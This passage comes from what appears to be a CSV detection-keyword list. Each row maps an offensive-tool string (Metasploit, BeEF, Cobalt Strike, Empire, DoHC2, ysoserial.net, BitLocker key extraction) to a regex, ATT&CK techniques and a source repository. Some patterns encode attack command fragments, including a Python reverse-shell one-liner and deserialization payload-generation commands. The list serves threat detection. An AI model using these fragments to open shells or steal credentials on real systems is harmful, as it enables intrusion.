- TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*exploits*_csrf/*.js*",".{0,1000}exploits.{0,1000}_csrf\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*exploits*_csrf/*.rb*",".{0,1000}exploits.{0,1000}_csrf\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*exploits/*_macro*",".{0,1000}exploits\/.{0,1000}_macro.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exploits/CVE-*",".{0,1000}exploits\/CVE\-.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exploits-forsale/prefetch-tool*",".{0,1000}exploits\-forsale\/prefetch\-tool.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*exploit-suggester*",".{0,1000}exploit\-suggester.{0,1000}","offensive_tool_keyword","Windows-Exploit-Suggester","This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. 
It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins","T1199 - T1082 - T1210","TA0006 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/AonCyberLabs/Windows-Exploit-Suggester","1","1","N/A","N/A","10","3849","1011","2023-05-11T12:44:55Z","2014-07-08T13:16:28Z" "*ExploitTest.cpp*",".{0,1000}ExploitTest\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","458","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*ExploitTest.vcxproj*",".{0,1000}ExploitTest\.vcxproj.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","458","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*export KRB5CCNAME=*.ccache*",".{0,1000}export\sKRB5CCNAME\=.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*export KRB5CCNAME=/*/impacket/administrator.ccache* ",".{0,1000}export\sKRB5CCNAME\=\/.{0,1000}\/impacket\/administrator\.ccache.{0,1000}\s","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*export NEMESIS_BASE_URL*",".{0,1000}export\sNEMESIS_BASE_URL.{0,1000}","offensive_tool_keyword","nemesis","An 
offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*export NEMESIS_CREDS*",".{0,1000}export\sNEMESIS_CREDS.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*export RHOST=*export RPORT=*python3 -c*socket.socket()*connect*os.getenv(""RHOST"")*pty.spawn(""sh"")*",".{0,1000}export\sRHOST\=.{0,1000}export\sRPORT\=.{0,1000}python3\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}os\.getenv\(\""RHOST\""\).{0,1000}pty\.spawn\(\""sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*exports --dll *.dll --prototypes ./Assets/prototypes.csv*",".{0,1000}exports\s\-\-dll\s.{0,1000}\.dll\s\-\-prototypes\s\.\/Assets\/prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*exposed_get_password*",".{0,1000}exposed_get_password.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*exrienz/DirtyCow*",".{0,1000}exrienz\/DirtyCow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","1","N/A","N/A","1","29","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" "*extensions/sniffer*",".{0,1000}extensions\/sniffer.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ExtensionSpoof.vbproj*",".{0,1000}ExtensionSpoof\.vbproj.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*ExtensionSpoof.xml*",".{0,1000}ExtensionSpoof\.xml.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*ExtensionSpoofer-1.zip*",".{0,1000}ExtensionSpoofer\-1\.zip.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" 
"*external_c2.cna*",".{0,1000}external_c2\.cna.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.*",".{0,1000}ExternalC2\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.dll*",".{0,1000}ExternalC2\.dll.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.Net*",".{0,1000}ExternalC2\.Net.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*ExternalC2.Net.*",".{0,1000}ExternalC2\.Net\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*externalc2.py*",".{0,1000}externalc2\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*ExternalC2\*",".{0,1000}ExternalC2\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*externalc2_start*",".{0,1000}externalc2_start.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson 
(https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Core*",".{0,1000}ExternalC2Core.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2-master*",".{0,1000}ExternalC2\-master.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Tests*",".{0,1000}ExternalC2Tests.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Web*",".{0,1000}ExternalC2Web.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalRecon.ps1*",".{0,1000}ExternalRecon\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*extract_cmd_exec*.js*",".{0,1000}extract_cmd_exec.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*extract_cmd_exec*.rb*",".{0,1000}extract_cmd_exec.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*extract_reflective_loader*",".{0,1000}extract_reflective_loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ExtractBitLockerKeys*@podalirius_*",".{0,1000}ExtractBitLockerKeys.{0,1000}\@podalirius_.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*ExtractBitlockerKeys.ps1*",".{0,1000}ExtractBitlockerKeys\.ps1.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*ExtractBitlockerKeys.py*",".{0,1000}ExtractBitlockerKeys\.py.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*ExtractBitlockerKeys-main*",".{0,1000}ExtractBitlockerKeys\-main.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" 
"*ExtractDataXML_BruteForce*",".{0,1000}ExtractDataXML_BruteForce.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Extract-HijackableKeysFromProcmonCSV*",".{0,1000}Extract\-HijackableKeysFromProcmonCSV.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*extracttgsrepfrompcap.py*",".{0,1000}extracttgsrepfrompcap\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*extra-scripts*timecrack.py*",".{0,1000}extra\-scripts.{0,1000}timecrack\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","167","17","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*eyewitness -f urls.txt --web*",".{0,1000}eyewitness\s\-f\surls\.txt\s\-\-web.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - 
TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-f BinaryFormatter -g PSObject -o base64 -c *",".{0,1000}\-f\sBinaryFormatter\s\-g\sPSObject\s\-o\sbase64\s\-c\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*-f Json.Net -g ObjectDataProvider -o raw -c *",".{0,1000}\-f\sJson\.Net\s\-g\sObjectDataProvider\s\-o\sraw\s\-c\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*-f payloads_examples/calc.*",".{0,1000}\-f\spayloads_examples\/calc\..{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*f0037d99bc3119fc613d304af20599e8c791b1c99208d5d452a01738777f7b49*",".{0,1000}f0037d99bc3119fc613d304af20599e8c791b1c99208d5d452a01738777f7b49.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*F00A3B5F-D9A9-4582-BBCE-FD10EFBF0C17*",".{0,1000}F00A3B5F\-D9A9\-4582\-BBCE\-FD10EFBF0C17.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*F06EAC7B-6996-4E78-B045-0DF6ED201367*",".{0,1000}F06EAC7B\-6996\-4E78\-B045\-0DF6ED201367.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" 